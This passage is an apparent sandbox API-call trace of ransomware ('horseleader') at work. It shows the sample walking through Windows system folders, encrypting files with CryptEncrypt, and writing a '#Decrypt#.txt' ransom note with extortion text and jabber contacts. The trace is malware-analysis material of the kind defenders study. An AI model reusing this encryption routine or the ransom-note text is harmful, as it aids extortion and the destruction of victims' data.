dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0250.983] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0250.983] CreateFileW (lpFileName="\\\\?\\C:\\Program 
Files\\Common Files\\System\\ado\\msado25.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado25.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0250.983] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83410e23, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x83410e23, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x83410e23, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x18000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msado26.tlb", cAlternateFileName="")) returned 1 [0250.983] lstrcmpiW (lpString1="msado26.tlb", lpString2="Windows") returned -1 [0250.983] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado26.tlb") returned 56 [0250.983] StrStrIW (lpFirst="msado26.tlb", lpSrch=".horseleader") returned 0x0 [0250.984] lstrcmpW (lpString1="msado26.tlb", lpString2="#Decrypt#.txt") returned 1 [0250.984] lstrcmpW (lpString1="msado26.tlb", lpString2="_uninstalling_.png") returned 1 [0250.984] lstrlenW (lpString=".testttjffg") returned 11 [0250.984] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado26.tlb", lpSrch=".testttjffg") returned 0x0 [0250.984] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0250.984] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0250.984] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado26.tlb" (normalized: "c:\\program files\\common 
files\\system\\ado\\msado26.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0250.985] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83436f83, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x83436f83, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8345d0e3, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x18000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msado27.tlb", cAlternateFileName="")) returned 1 [0250.985] lstrcmpiW (lpString1="msado27.tlb", lpString2="Windows") returned -1 [0250.985] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado27.tlb") returned 56 [0250.985] StrStrIW (lpFirst="msado27.tlb", lpSrch=".horseleader") returned 0x0 [0250.985] lstrcmpW (lpString1="msado27.tlb", lpString2="#Decrypt#.txt") returned 1 [0250.985] lstrcmpW (lpString1="msado27.tlb", lpString2="_uninstalling_.png") returned 1 [0250.985] lstrlenW (lpString=".testttjffg") returned 11 [0250.985] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado27.tlb", lpSrch=".testttjffg") returned 0x0 [0250.985] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0250.985] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0250.985] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado27.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado27.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0250.986] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83483244, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x83483244, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x83483244, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x18000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msado28.tlb", cAlternateFileName="")) returned 1 [0250.986] lstrcmpiW (lpString1="msado28.tlb", lpString2="Windows") returned -1 [0250.986] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado28.tlb") returned 56 [0250.986] StrStrIW (lpFirst="msado28.tlb", lpSrch=".horseleader") returned 0x0 [0250.986] lstrcmpW (lpString1="msado28.tlb", lpString2="#Decrypt#.txt") returned 1 [0250.986] lstrcmpW (lpString1="msado28.tlb", lpString2="_uninstalling_.png") returned 1 [0250.986] lstrlenW (lpString=".testttjffg") returned 11 [0250.986] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado28.tlb", lpSrch=".testttjffg") returned 0x0 [0250.986] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0250.986] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0250.986] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado28.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado28.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0250.986] 
FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ec495ee, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x9ec495ee, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x9ec6f74e, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x72000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msadomd.dll", cAlternateFileName="")) returned 1 [0250.986] lstrcmpiW (lpString1="msadomd.dll", lpString2="Windows") returned -1 [0250.987] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadomd.dll") returned 56 [0250.987] StrStrIW (lpFirst="msadomd.dll", lpSrch=".horseleader") returned 0x0 [0250.987] lstrcmpW (lpString1="msadomd.dll", lpString2="#Decrypt#.txt") returned 1 [0250.987] lstrcmpW (lpString1="msadomd.dll", lpString2="_uninstalling_.png") returned 1 [0250.987] lstrlenW (lpString=".testttjffg") returned 11 [0250.987] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadomd.dll", lpSrch=".testttjffg") returned 0x0 [0250.987] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0250.987] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0250.987] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadomd.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msadomd.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0250.987] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: 
lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62a6a67, ftCreationTime.dwHighDateTime=0x1ca041a, ftLastAccessTime.dwLowDateTime=0x62a6a67, ftLastAccessTime.dwHighDateTime=0x1ca041a, ftLastWriteTime.dwLowDateTime=0x625a7ad, ftLastWriteTime.dwHighDateTime=0x1ca041a, nFileSizeHigh=0x0, nFileSizeLow=0x5000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msadomd28.tlb", cAlternateFileName="")) returned 1 [0250.987] lstrcmpiW (lpString1="msadomd28.tlb", lpString2="Windows") returned -1 [0250.987] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadomd28.tlb") returned 58 [0250.987] StrStrIW (lpFirst="msadomd28.tlb", lpSrch=".horseleader") returned 0x0 [0250.987] lstrcmpW (lpString1="msadomd28.tlb", lpString2="#Decrypt#.txt") returned 1 [0250.987] lstrcmpW (lpString1="msadomd28.tlb", lpString2="_uninstalling_.png") returned 1 [0250.987] lstrlenW (lpString=".testttjffg") returned 11 [0250.987] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadomd28.tlb", lpSrch=".testttjffg") returned 0x0 [0250.988] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0250.988] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0250.988] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadomd28.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msadomd28.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0250.989] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ad50fa2, 
ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8ad50fa2, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8ad50fa2, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xf000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msador15.dll", cAlternateFileName="")) returned 1 [0250.989] lstrcmpiW (lpString1="msador15.dll", lpString2="Windows") returned -1 [0250.990] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msador15.dll") returned 57 [0250.990] StrStrIW (lpFirst="msador15.dll", lpSrch=".horseleader") returned 0x0 [0250.990] lstrcmpW (lpString1="msador15.dll", lpString2="#Decrypt#.txt") returned 1 [0250.990] lstrcmpW (lpString1="msador15.dll", lpString2="_uninstalling_.png") returned 1 [0250.990] lstrlenW (lpString=".testttjffg") returned 11 [0250.990] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msador15.dll", lpSrch=".testttjffg") returned 0x0 [0250.990] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0250.990] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0250.990] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msador15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msador15.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0250.990] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9debf8b5, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x9debf8b5, 
ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x9dee5a15, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x79000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msadox.dll", cAlternateFileName="")) returned 1 [0250.990] lstrcmpiW (lpString1="msadox.dll", lpString2="Windows") returned -1 [0250.990] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadox.dll") returned 55 [0250.990] StrStrIW (lpFirst="msadox.dll", lpSrch=".horseleader") returned 0x0 [0250.990] lstrcmpW (lpString1="msadox.dll", lpString2="#Decrypt#.txt") returned 1 [0250.990] lstrcmpW (lpString1="msadox.dll", lpString2="_uninstalling_.png") returned 1 [0250.990] lstrlenW (lpString=".testttjffg") returned 11 [0250.991] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadox.dll", lpSrch=".testttjffg") returned 0x0 [0250.991] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0250.991] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0250.991] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadox.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msadox.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0250.991] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5fd3080, ftCreationTime.dwHighDateTime=0x1ca041a, ftLastAccessTime.dwLowDateTime=0x5fd3080, ftLastAccessTime.dwHighDateTime=0x1ca041a, ftLastWriteTime.dwLowDateTime=0x5f60c69, ftLastWriteTime.dwHighDateTime=0x1ca041a, 
nFileSizeHigh=0x0, nFileSizeLow=0x7000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msadox28.tlb", cAlternateFileName="")) returned 1 [0250.991] lstrcmpiW (lpString1="msadox28.tlb", lpString2="Windows") returned -1 [0250.991] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadox28.tlb") returned 57 [0250.991] StrStrIW (lpFirst="msadox28.tlb", lpSrch=".horseleader") returned 0x0 [0250.991] lstrcmpW (lpString1="msadox28.tlb", lpString2="#Decrypt#.txt") returned 1 [0250.991] lstrcmpW (lpString1="msadox28.tlb", lpString2="_uninstalling_.png") returned 1 [0250.991] lstrlenW (lpString=".testttjffg") returned 11 [0250.991] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadox28.tlb", lpSrch=".testttjffg") returned 0x0 [0250.991] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0250.991] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0250.991] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadox28.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msadox28.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0250.992] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf55bba, ftCreationTime.dwHighDateTime=0x1ca041a, ftLastAccessTime.dwLowDateTime=0xbf55bba, ftLastAccessTime.dwHighDateTime=0x1ca041a, ftLastWriteTime.dwLowDateTime=0x347dbdb0, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x1a000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, 
cFileName="msadrh15.dll", cAlternateFileName="")) returned 1 [0250.992] lstrcmpiW (lpString1="msadrh15.dll", lpString2="Windows") returned -1 [0250.992] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadrh15.dll") returned 57 [0250.992] StrStrIW (lpFirst="msadrh15.dll", lpSrch=".horseleader") returned 0x0 [0250.992] lstrcmpW (lpString1="msadrh15.dll", lpString2="#Decrypt#.txt") returned 1 [0250.992] lstrcmpW (lpString1="msadrh15.dll", lpString2="_uninstalling_.png") returned 1 [0250.992] lstrlenW (lpString=".testttjffg") returned 11 [0250.992] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadrh15.dll", lpSrch=".testttjffg") returned 0x0 [0250.992] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0250.992] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0250.992] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadrh15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msadrh15.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0250.992] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf55bba, ftCreationTime.dwHighDateTime=0x1ca041a, ftLastAccessTime.dwLowDateTime=0xbf55bba, ftLastAccessTime.dwHighDateTime=0x1ca041a, ftLastWriteTime.dwLowDateTime=0x347dbdb0, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x1a000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msadrh15.dll", cAlternateFileName="")) returned 0 [0250.992] FindClose (in: hFindFile=0x7c6860 | 
out: hFindFile=0x7c6860) returned 1 [0250.992] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\#Decrypt#.txt") returned 58 [0250.992] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\system\\ado\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0250.993] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. 
\r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0250.993] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0250.994] lstrlenA (lpString="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") returned 1368 [0250.995] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0250.995] CloseHandle (hObject=0x21c) returned 1 [0250.995] GetProcessHeap () returned 0x780000 [0250.995] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b628 | out: hHeap=0x780000) returned 1 [0250.995] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf4f1c09, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xbf4f1c09, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x128ffb00, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x7200, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="DirectDB.dll", cAlternateFileName="")) returned 1 [0250.995] lstrcmpiW (lpString1="DirectDB.dll", lpString2="Windows") returned -1 [0250.995] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\DirectDB.dll") returned 53 [0250.995] StrStrIW (lpFirst="DirectDB.dll", lpSrch=".horseleader") returned 0x0 [0250.995] lstrcmpW (lpString1="DirectDB.dll", lpString2="#Decrypt#.txt") returned 1 [0250.995] lstrcmpW (lpString1="DirectDB.dll", lpString2="_uninstalling_.png") 
returned 1 [0250.995] lstrlenW (lpString=".testttjffg") returned 11 [0250.995] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\DirectDB.dll", lpSrch=".testttjffg") returned 0x0 [0250.995] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0250.995] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0250.996] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\DirectDB.dll" (normalized: "c:\\program files\\common files\\system\\directdb.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0250.996] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="en-US", cAlternateFileName="")) returned 1 [0250.997] lstrcmpiW (lpString1="en-US", lpString2="Windows") returned -1 [0250.997] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US") returned 46 [0250.997] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0250.997] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0250.997] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0250.997] GetProcessHeap () returned 0x780000 [0250.997] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, 
Size=0x840) returned 0x79b628 [0250.997] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\*") returned 48 [0250.997] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0250.998] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0250.998] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\.") returned 48 [0250.998] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0250.998] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0250.998] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0250.998] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\..") returned 49 [0250.998] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0250.998] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0250.998] 